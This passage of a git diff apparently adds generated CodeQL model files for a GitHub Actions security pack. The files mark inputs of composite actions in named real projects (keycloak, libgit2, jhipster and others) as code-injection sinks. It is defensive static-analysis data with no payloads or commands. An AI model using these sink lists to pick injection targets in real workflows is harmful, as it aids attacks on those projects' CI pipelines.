100644 index 00000000000..293d8a832bd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml new file mode 100644 index 00000000000..c72000641ce --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml new file mode 100644 index 00000000000..53929ab8ed1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml new file mode 100644 index 00000000000..1330f370747 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml new file mode 100644 index 00000000000..d9d9c6770bc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml new file mode 100644 index 00000000000..faf1d7ed5c5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml new file mode 100644 index 00000000000..12ae92c149b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml new file mode 100644 index 00000000000..61001620017 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml new file mode 100644 index 00000000000..1d30610cfd1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml new file mode 100644 index 00000000000..867dc33f432 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml new file mode 100644 index 00000000000..87b014cbdd6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml new file mode 100644 index 00000000000..6dd3ac94306 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml new file mode 100644 index 00000000000..f952bd1da93 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml new file mode 100644 index 00000000000..977662bfa65 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml new file mode 100644 index 00000000000..4c6c92fdefd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml new file mode 100644 index 00000000000..45c2c1d780a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml new file mode 100644 index 00000000000..1edfbfc9432 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml new file mode 100644 index 00000000000..658283336bd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml new file mode 100644 index 00000000000..d00b30874cc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml new file mode 100644 index 00000000000..94ece1a58a0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml new file mode 100644 index 00000000000..46d5a4383f4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml new file mode 100644 index 00000000000..5627a31bd90 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml new file mode 100644 index 00000000000..98d2d8bcbf7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml new file mode 100644 index 00000000000..57fb2e71064 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml new file mode 100644 index 00000000000..8a216b97e1e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml new file mode 100644 index 00000000000..735413808ec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml new file mode 100644 index 00000000000..54334359d0e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml new file mode 100644 index 00000000000..67826ea9c0f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml new file mode 100644 index 00000000000..d0540414702 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml new file mode 100644 index 00000000000..9020a979bbb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml new file mode 100644 index 00000000000..91c84fda1d1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml new file mode 100644 index 00000000000..5031ff1e4ca --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 00000000000..fc3a7ebe253 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml new file mode 100644 index 00000000000..b7a664d512f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml new file mode 100644 index 00000000000..234f13b7387 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml new file mode 100644 index 00000000000..164ba02c42b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml new file mode 100644 index 00000000000..17fb61eeeb1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml new file mode 100644 index 00000000000..8513c7da64d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml new file mode 100644 index 00000000000..a4ab8f025d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appFile", 